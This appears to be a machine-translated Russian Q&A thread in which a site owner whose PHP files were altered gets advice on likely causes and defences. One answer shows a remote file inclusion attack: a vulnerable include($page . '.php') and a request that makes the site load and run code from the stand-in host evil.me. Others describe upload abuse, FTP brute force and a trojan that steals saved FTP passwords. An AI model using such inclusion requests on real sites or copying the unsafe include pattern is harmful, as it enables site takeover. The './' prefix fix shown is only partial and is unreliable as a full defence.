PHP: Я был взломан [закрытый]
8 ответов
Кто-то имеет доступ (не через xss или sql-инъекцию) к вашим php-файлам на вашем сервере. Если это общий сервер, вполне возможно, что весь сервер каким-то образом был скомпрометирован. Вы можете удалить эту чушь в верхней части ваших php-файлов и сделать их доступными только для чтения. Однако, поскольку я предполагаю, что это общий сервер, если ваш веб-хост не исправляет недостаток безопасности, который позволил это в первую очередь, этого может быть недостаточно. Поговорите со своим хостинг-провайдером (лично я бы просто перешел к новому провайдеру, это хороший признак того, что эти ребята безнадежны).
Защитите свой сервер, попробуйте связаться с соответствующими людьми , сервер, похоже, был взломан.
Если у вас open_wrappers = on, и вы используете что-то подобное где-то на сайте
http://domain.tld/index.php?page=somenameofpage
Где-то в index.php (или включенных файлах)
<?php
include($page . '.php');
?>
Тогда кто-то может скомпрометировать ваш сайт, запросив
http://domain.tld/index.php?page=http://evil.me/evilcode.txt?
(значение страницы должно быть закодировано для работы - я ленив, поэтому не закодировал его. Обратите внимание на? В конце ..
То, что вы сейчас фактически включаете, это
http://evil.me/evilcode.txt?.php
- evilcode.txt -
<?php
echo 'some evil code huh!';
Этот vil выполняет php-код в evilcode.txt
Быстрое исправление заключалось бы в добавлении. К пути к включению - вот так
include('./' . $page . '.php');
Я усвоил это на собственном горьком опыте .. Стал администратором существующего сайта, который использовал этот метод для навигации. Мне потребовались месяцы, чтобы понять это, хотя хакер не заменил никакой код - он просто добавил файлы в некоторые подпапки. И да, он добавил несколько бэкдоров в файлы .js и .css, которые обнаружил пользователь AntiVir.
Удалить строку кода?
Это атака на ваш сервер, которая позволила злоумышленнику изменить файлы сервера. Это может происходить через права доступа к папке (наличие разрешения 777 - это плохо) или если вы разрешаете своим сценариям изменять другие сценарии на вашем сервере.
Вы можете проверить права доступа к папке.
Что это за атака? это действительно хсс? На самом деле никто не знает моего пароля ftp.
Существует несколько векторов атак этого типа:
Уязвимость программного обеспечения. Это может быть устаревший PHP, MySQL, Apache или что-то еще. Возможно, был скомпрометирован весь сервер.
Уязвимость в сценариях. Уязвимость, обычно связанная с широко используемым приложением PHP, используемым для загрузки и выполнения команд. Распространенным является программное обеспечение для фотогалереи, которое обманом загружает переименованные файлы php, позволяя переименовывать расширение на сервере с jpg обратно на исходный php, а затем запускать, разрешая любые действия, разрешенные сценариями (обычно администратор PHP / root kit загружается таким образом, давая злоумышленнику возможность свободно загружать и изменять файлы)
Атака методом грубой силы FTP. Как правило, ваш сервер должен быть настроен так, чтобы иметь возможность блокировать IP-адрес, который делает неоднократные неудачные попытки входа в систему.
Пользовательское заражение. Относительно новый вектор атаки, троян (большинство из них до сих пор используют уязвимости в плагине Adobe PDF Reader из-за того, что он работает в FireFox, но любой эксплойт браузера, допускающий выполнение кода, будет работать) для установки трояна на компьютер проходящего пользователя. Троян ищет на компьютере пользователя распространенные программы FTP, такие как Filezilla и Dreamweaver, в поисках сохраненных паролей. Как только он обнаруживает FTP-логин, он обращается к этому сайту с собственного компьютера пользователя и пытается изменить известные типы файлов (htm, php, asp и т. Д.), Вставляя свой собственный код (большинство из них ищут тег HEAD и вставляют сразу после этого) - тот же код, который изначально заразил компьютер пользователя.После этого он может работать как любой другой троян (установить рекламное ПО или оставаться скрытым и сделать компьютер пользователя частью ботнета).
Большинство людей останавливают атаки внедрения кода, сначала удаляя вирусный код, а затем делая все файлы PHP только для чтения, пока ищут эксплойт, который использовался для записи в ваши файлы PHP.
У нас была та же проблема. Действительно стыдно признаться, но это случилось с нами, потому что пользователи могли загружать файлы с любым расширением и запускать их на сервере. Итак, какой-то пользователь загрузил php-скрипт и выполнил его. : -)
Мы решили проблему, установив фильтры и атрибуты только для чтения для загружаемых файлов.
Просто удалите эту строку и исправьте свой сервер. Скорее всего вы заражены бэкдором.